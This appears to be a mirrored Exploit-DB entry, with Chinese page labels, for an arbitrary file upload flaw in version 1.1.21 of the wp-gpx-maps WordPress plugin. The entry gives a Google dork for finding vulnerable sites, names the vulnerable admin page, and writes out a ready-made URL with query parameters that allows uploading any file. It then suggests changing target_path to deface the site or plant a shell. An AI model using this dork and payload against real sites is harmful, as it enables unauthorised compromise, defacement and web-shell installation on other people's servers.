WordPress Plugin wp-gpx-map 1.1.21 – Arbitrary File Upload

• Exploit Database
• 15 阅读

• 作者： Adrien Thierry
  日期： 2012-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19050/

• ###########################################################
  #
  # Exploit Title: WordPress wp-gpx-map version 1.1.21 Arbitrary File Upload
  # Google Dork: inurl:wp-content/plugins/wp-gpx-maps/
  # Date: 11/05/2012
  # Exploit Author: Adrien Thierry
  # Vendor Homepage: http://www.darwinner.it/
  # Software Link: http://downloads.wordpress.org/plugin/wp-gpx-maps.1.1.21.zip
  # Version: 1.1.21
  #
  ###########################################################
  
  Vuln page : http://mysite.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php
  
  exploit :
  
  Go to url :
  
  http://my-site.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php?realGpxPath=.&target_path=.&gpxRegEx=//
  
  And you can upload what you want. You could change file path with target_path (deface, shell etc...)
  
  #####################################################################